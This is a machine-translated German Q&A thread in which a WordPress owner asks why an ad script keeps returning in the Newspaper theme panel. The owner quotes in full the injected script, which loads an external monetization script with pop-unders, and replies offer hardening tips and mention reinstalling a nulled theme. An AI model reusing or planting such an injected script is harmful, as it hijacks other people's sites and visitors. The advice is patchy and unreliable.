-2

Jemand fügt einen adv-Code in meiner Website alle zwei Tage hinzu. Ich entferne es und dann am zweiten Tag, es ist zurück gekommen.Wie kann ich feststellen, wie jemand meine WordPress-Website hackt?

Ich habe bereits meine WordPress-Website Passwort geändert und nichts mehr. Und ja, der Adv-Code erscheint automatisch in meinem Zeitungs-Theme-Panel.

Bis jetzt waren es 6 Tage, aber außer diesem Adv Code kann ich wirklich nichts Seltsames sehen.

Und ich bin der einzige Benutzer in meinem WordPress-Panel auch.

Hier ist der Code:

<script type="text/javascript">//<![CDATA[ 
(function() { 
    var configuration = { 
    "token": "f17143abbffd1edf14788c13fa8a1b08", 
    "entryScript": { 
     "type": "click", 
     "capping": { 
      "limit": 5, 
      "timeout": 24 
     } 
    }, 
    "exitScript": { 
     "enabled": true 
    }, 
    "popUnder": { 
     "enabled": true 
    } 
}; 
    var script = document.createElement('script'); 
    script.async = true; 
    script.src = '//cdn.shorte.st/link-converter.min.js'; 
    script.onload = script.onreadystatechange = function() {var rs = this.readyState; if (rs && rs != 'complete' && rs != 'loaded') return; shortestMonetization(configuration);}; 
    var entry = document.getElementsByTagName('script')[0]; 
    entry.parentNode.insertBefore(script, entry); 
})(); 
//]]></script> 
+0

Ändern Sie Ihre wp-Admin-Verzeichnis, härteres Passwort, das Sie verwenden müssen. Admin Benutzername und Passwort sollte stärker sein und anders können Sie Sicherheits-Plugin verwenden. –

+0

irgendein Vorschlag für ein Sicherheits-Plugin? –

+0

und für "ändern Sie Ihre wp-Admin-Verzeichnis" kann dies helfen https://wordpress.org/plugins/protect-wp-admin/ –

Antwort

0

i zu verwenden Zeitung Thema, und bekam zu treffen, die gleiche Art von Code, versucht Admin-Login-Seite zu ändern, admin entfernen und das Passwort neu machen ist, verändern orther Pass Benutzer, neuere Thema neu installieren (null), ftp ändern Berechtigungen von Theme und Plugin zu, aber immer noch wieder getroffen, so dass ich glaube nicht, dass alle diese Änderungen irgendwie resust bekommen. Also versuche ich meinen letzten Akt, bevor ich gehe alles neu zu installieren include worpress ist selbst, ich sendete eine Mail zu shorte.st mit dem Javascrip sie fragen, um diese Person herauszufinden und sie zu blockieren. Übrigens, Sie müssen die Einstellung auch im Bereich "Who can register" überprüfen, es wird von "admin" auf "excrible" umgestellt. repariere das zuerst. Ich hoffe das hilft.

+0

Hallo! Es wäre besser, wenn Sie [So erstellen Sie ein minimales, vollständiges und verifizierbares Beispiel] (http://stackoverflow.com/help/mcve) Ihres Codes für zukünftige Bemühungen beim Stack-Überlauf auschecken. -Vielen Dank – Momin

Verwandte Themen